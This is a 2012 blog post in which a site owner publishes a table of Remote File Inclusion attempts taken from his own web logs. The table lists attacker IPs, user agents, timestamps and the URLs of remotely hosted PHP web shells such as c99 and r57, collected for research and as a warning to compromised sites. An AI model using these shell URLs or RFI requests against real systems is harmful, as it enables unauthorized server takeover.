segunda-feira, dezembro 31, 2012

Web Shells and RFIs Collection

| In , ,

Web Shells and RFIs Collection

      I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple time, so I ignore the time fields in judging if an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer hiding service so it does not look like I'm attacking anyone with the web shells (but the check for 404 sort of looks suspicious). This page will also let you link off to firebwall.com where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo, it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells you are likely pwned and should clean up your server.
Filtered for more likely Webshell RFIs
AttackerWhois IPRequestView on PHP DecoderAgentRefererTime
187.40.82.13Whoishttp://www.amerint.com.br/plugins/system/chupa.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-24/Dec/2012:19:47:31 -0800
187.40.81.59Whoishttp://www.goodigood.com/mcharge/php/class//ekta.txt?View on PHP Decoder--20/Dec/2012:13:48:06 -0800
186.249.211.224Whoishttp://www.goodigood.com/mcharge/php/class//dek.txt?View on PHP Decoder--20/Dec/2012:01:16:04 -0800
189.90.43.3Whoishttp://www.qualityom.com.br/plugins/system/ip.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Dec/2012:12:17:48 -0800
187.58.105.54Whoishttp://c99.gen.tr/c99.txt?View on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1-17/Dec/2012:13:26:10 -0800
187.40.106.182Whoishttp://www.luvex.com.br/teste/riko.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-16/Dec/2012:20:34:42 -0800
200.98.143.17Whoishttp://www.goodigood.com/mainfiles/teste.txt?View on PHP Decoder--14/Dec/2012:16:12:49 -0800
189.72.209.60Whoishttp://casamarvera10.cwahi.net/tester.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-13/Dec/2012:13:57:09 -0800
200.98.143.17Whoishttp://www.goodigood.com/mainfiles/inside.txt?View on PHP Decoder--13/Dec/2012:04:38:05 -0800
81.177.22.64Whoishttp://adamhomes.co.uk/scripts/id1.txt?View on PHP DecoderMozilla/5.0-13/Dec/2012:01:15:11 -0800
118.97.95.231Whoishttp://ijencrew.wapsite.me/bnc.ichat.txt??View on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0-11/Dec/2012:09:04:35 -0800
190.188.186.123Whoishttp://mobile.asnieres-sur-seine.fr/data/hjkjyuf43.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-09/Dec/2012:17:21:14 -0800
187.40.111.9Whoishttp://www.khonkaenrongyen.com/plugins/cmd2.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-06/Dec/2012:20:58:26 -0800
187.40.103.247Whoishttp://www.jcestetica.com.br/plugins/system/r57.txt??View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-06/Dec/2012:06:38:05 -0800
111.68.215.186Whoishttp://www.sungeundongsan.org/zb/id.txt?View on PHP Decoderlibwww-perl/5.805-05/Dec/2012:21:35:42 -0800
200.98.129.248Whoishttp://www.ideocondo.com/php/new/flood/Scripts/g.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-03/Dec/2012:18:45:35 -0800
200.98.164.226Whoishttp://swiatodziezy.com/libraries/inside.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Dec/2012:10:11:41 -0800
177.6.107.193Whoishttp://www.kini-kini.com/ancien_kini/optms.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-29/Nov/2012:03:43:41 -0800
5.39.9.95Whoishttp://www.dunkerquepromotion.org/images/temoignages/danger.txt??View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1-27/Nov/2012:16:21:38 -0800
111.119.184.52Whoishttp://c99.gen.tr/c99.txtView on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0-26/Nov/2012:22:24:24 -0800
200.98.140.97Whoishttp://www.ntempreco.com/teste.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-26/Nov/2012:16:29:14 -0800
200.98.129.118Whoishttp://www.asiandogs.ru/dog/id1.txt??View on PHP DecoderMozilla/5.0-24/Nov/2012:16:48:24 -0800
189.73.212.194Whoishttp://galaxiauniversal.com/css/optms.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-24/Nov/2012:03:09:29 -0800
187.40.94.178Whoishttp://www.jcestetica.com.br/plugins/system/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-20/Nov/2012:12:21:40 -0800
176.254.215.142Whoishttp://www.drivehq.com/web/v3nd3tta/shells/c99.txt?View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0-18/Nov/2012:15:45:22 -0800
177.25.109.82Whoishttp://egyptinsideout.com/plugins/system/nnframework/images/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-17/Nov/2012:04:26:40 -0800
189.74.19.227Whoishttp://pc.eromil.com/goza.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-16/Nov/2012:15:47:09 -0800
200.98.171.238Whoishttp://acesso9583.hut4.ru/tester.txt?View on PHP Decoder--14/Nov/2012:16:43:05 -0800
201.15.114.66Whoishttp://www.buy-nippon-motors.com/com/js/swfobject/optms.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:14:58:25 -0800
187.90.77.194Whoishttp://www.xambre.pr.gov.br/plugins/system/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:08:46:22 -0800
189.48.124.171Whoishttp://egyptinsideout.com/plugins/system//tooltips/images/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:06:18:24 -0800
189.1.174.192Whoishttp://www.wushu.org.ge/e107_images/david.txtView on PHP DecoderMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1-13/Nov/2012:17:23:57 -0800
201.24.16.247Whoishttp://produtosmaster.com/sonaberadinha.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-09/Nov/2012:04:25:14 -0800
189.73.213.247Whoishttp://produtosmaster.com/sonaberadinha.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-08/Nov/2012:10:35:59 -0800
5.39.9.95Whoishttp://swjzaleze.ovh.org/swietlica_15/danger.txt??View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1-04/Nov/2012:08:49:21 -0800
49.156.155.246Whoishttp://ead-aerospace.com/Intranet/Dossiers/Customers/2/c99.txtView on PHP DecoderMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4-01/Nov/2012:07:32:59 -0700
72.55.132.168Whoishttp://jamina.vacau.com/e107_admin/raw.txt??View on PHP DecoderMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511-26/Oct/2012:20:12:31 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/changemacView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:11:12:35 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/windows-forensics-registry-and-file-system-spotsView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:11:09:59 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/networkprinterhackingView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:10:35:49 -0700
177.0.49.124Whoishttp://www.jkchemicals.in/wp-content/themes/Chameleon/cache/shell.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-20/Oct/2012:18:22:20 -0700
186.247.205.162Whoishttp://www.acfinance.com.br/tool.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Oct/2012:09:45:34 -0700
200.98.164.62Whoishttp://c99.gen.tr/c99.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-17/Oct/2012:16:42:06 -0700
217.71.106.39Whoishttp://www.avidsen.com/2009/danger.txt????View on PHP DecoderMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13-17/Oct/2012:05:41:12 -0700
63.143.40.27Whoishttp://www.nysnagard.no/mail.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-04/Oct/2012:08:25:27 -0700
187.40.106.157Whoishttp://www.akakaslogistics.com/manolo.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Oct/2012:22:20:27 -0700

0 comentários:

Postar um comentário